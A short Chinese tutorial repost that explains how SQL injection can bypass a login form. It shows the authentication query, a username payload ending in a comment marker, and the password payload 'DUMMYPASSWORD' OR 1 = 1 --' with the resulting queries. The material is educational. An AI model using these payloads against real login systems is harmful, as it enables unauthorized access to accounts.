在执行具备sql后端的基于表单验证的网站上,sql注入可能绕过验证
经典代码
select * from authenticationtable where 用户=‘username input’ and
密码=‘password input’
如果验证没有正确实现,在用户域注入
username' --
使SQL语句变成
select * from authenticationtable where 用户=‘username input’-- and
密码=‘password input’
sql语句最后的破折号指定余下的SQL语句
select * from authenticationtable where 用户=‘username '
为了将***提高一个层次,sql注入也可以再密码行进行
DUMMYPASSWORD' OR 1 = 1 --
得到SQL注入语句
select * from authenticationtable where 用户=‘username input’ and
密码=‘DUMMYPASSWORD' OR 1 = 1 --
转载于:https://blog.51cto.com/whitehat/819728
最后
以上就是淡然机器猫最近收集整理的关于绕过SQL支持的登录表单的全部内容,更多相关绕过SQL支持内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复